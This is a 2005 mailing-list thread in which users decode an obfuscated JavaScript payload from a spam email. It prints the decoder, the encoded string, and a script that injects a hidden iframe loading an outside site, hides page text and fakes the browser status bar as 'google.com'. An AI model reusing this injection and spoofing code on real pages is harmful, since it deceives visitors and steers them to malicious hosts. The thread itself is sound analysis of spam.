Re: decyphering spam
On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote:
> On 6/2/05, Steve Lamb <grey@dmiyu.org> wrote:
> > michael wrote:
> > > how do i decypher what the following HTML/javascript attempts (original
> > > 'write' was all one line)?
> >
> > Personally, I used Python's urllib.unquote and got the following:
> >
> > <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script
> > language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));
> > var
> > t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
> >
> > > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> > > 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
> >
> > Which is then fed the above segment to decode. Don't feel like digging
> > into the above javascript to make a Python equivolant decoder for that
> > section. Maybe someone else will jump in? :D
> >
>
> That final segment decodes to this:
>
> SCRIPT LANGUAGE="javascript" SRC="foto.js"> // SAMPLE SCRIPT #2 -
> CALLING AN EXTERNAL JS FILE </SCRIPT
>
> which, unless there was a base reference issued in the actual spam,
> leads nowhere. :)
>
well i can 'wget' the foto.js from the site which is (if anybody is
interested!) a bit too simple to decode but those up for the challenge
could decypher the index.php
url = "http://www.trafficpro.us/index.php";;
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%
></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='google.com'",7);
> --
> ~ Darryl ~ smartssa@gmail.com
> http://smartssa.com / http://darrylclarke.com
>
--
Michael Bane
Atmospheric Physics Group
University of Manchester
Reply to: